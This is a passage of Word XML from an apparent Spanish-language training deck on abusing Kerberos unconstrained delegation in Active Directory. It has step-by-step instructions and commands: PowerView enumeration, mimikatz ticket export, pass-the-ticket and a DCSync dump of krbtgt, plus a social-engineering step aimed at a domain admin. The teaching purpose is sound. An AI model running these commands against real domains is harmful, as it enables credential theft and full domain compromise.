      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060121B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId270"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="153"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74761940" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:spacing w:line="566" w:lineRule="exact"/>
        <w:ind w:left="582"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-&gt; Delegación sin restricciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B3B4EB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="308"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16308134" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1662"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:right="791"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>En caso de que la delegación restringida esté habilitada, DC coloca el TGT del usuario dentro de TGS. Cuando el usuario lo presenta al servidor con la delegación sin restricciones habilitada, ese TGT se extrae del TGS y se almacena en la memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD955AC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B880A5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="184"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422C3FFD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1662"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1558"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El adversario puede exportar ese TGT para acceder a cualquier otro recurso como ese usuario. Ahora imagina las consecuencias cuando obtenemos el TGT de un Administrador de Dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369FA51A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258DA845" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467D2007" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1662"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Enumere los equipos que tienen habilitada la delegación sin restricciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494298E4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF02F55" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="66"/>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1504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BC07700" wp14:editId="41A207A7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3944111</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>217259</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4666615" cy="373380"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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6615" cy="373380"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="29853D07" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="98"/>
                              <w:ind w:left="261"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Get-NetComputer –unconstrained -verbose</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1BC07700" id="Textbox 534" o:spid="_x0000_s1279" type="#_x0000_t202" style="position:absolute;margin-left:310.55pt;margin-top:17.1pt;width:367.45pt;height:29.4pt;z-index:-15614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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="29853D07" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="98"/>
                        <w:ind w:left="261"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Get-NetComputer –unconstrained -verbose</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5494D1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="540" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DDCD99" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="735"/>
        </w:tabs>
        <w:spacing w:before="51"/>
        <w:ind w:left="735" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pasos para el abuso de delegación sin restricciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46253ED9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="258"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE8E3A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1455"/>
        </w:tabs>
        <w:ind w:left="1455" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El adversario puede poner en peligro el servidor en el que está habilitada la delegación sin restricciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A712DF8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="126"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32FD4974" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1456"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1629"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Mediante la ingeniería social, un adversario puede engañar al administrador del dominio o a cualquier usuario privilegiado para que se conecte al servidor ya comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F7B01F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="92"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2C6BF4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1455"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1455" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Extraiga el administrador del dominio TGT :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39364F8D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="11"/>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2016" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="000C648B" wp14:editId="7679D7EC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3145535</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>58404</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5972810" cy="437515"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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810" cy="437515"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7648DE6E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="148"/>
                              <w:ind w:left="280"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>invoke-mimikatz –command '"sekurlsa::tickets /export"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="000C648B" id="Textbox 535" o:spid="_x0000_s1280" type="#_x0000_t202" style="position:absolute;margin-left:247.7pt;margin-top:4.6pt;width:470.3pt;height:34.45pt;z-index:-15614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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7648DE6E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="148"/>
                        <w:ind w:left="280"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>invoke-mimikatz –command '"sekurlsa::tickets /export"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="73969AE1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1455"/>
        </w:tabs>
        <w:spacing w:before="235"/>
        <w:ind w:left="1455" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Reutilice el ticket para realizar otras operaciones como administrador de dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C08E97" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="43"/>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2528" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B5D781D" wp14:editId="0BD5D012">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3145535</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>203130</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6044565" cy="437515"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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437515"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2258F67D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="194"/>
                              <w:ind w:left="459"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>invoke-mimikatz –command '"kerberos::p tt ticket.kirbi"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3B5D781D" id="Textbox 536" o:spid="_x0000_s1281" type="#_x0000_t202" style="position:absolute;margin-left:247.7pt;margin-top:16pt;width:475.95pt;height:34.45pt;z-index:-1561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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2258F67D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="194"/>
                        <w:ind w:left="459"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>invoke-mimikatz –command '"kerberos::p tt ticket.kirbi"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2B2394" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1455"/>
        </w:tabs>
        <w:spacing w:before="266"/>
        <w:ind w:left="1455" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejecutar el ataque DCSYNC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B00ADD2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="190"/>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703040" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="249C0CB8" wp14:editId="11A0C1F1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2382011</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>295999</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7962900" cy="368935"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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0" cy="368935"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="53A6611F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="86"/>
                              <w:ind w:left="137"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>invoke-mimikatz -command '"lsadump::d csync /user:cyberwarfare\krbtgt"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="249C0CB8" id="Textbox 537" o:spid="_x0000_s1282" type="#_x0000_t202" style="position:absolute;margin-left:187.55pt;margin-top:23.3pt;width:627pt;height:29.05pt;z-index:-1561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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="53A6611F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="86"/>
                        <w:ind w:left="137"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>invoke-mimikatz -command '"lsadump::d csync /user:cyberwarfare\krbtgt"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="24192EF4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="140" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752AFC10" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
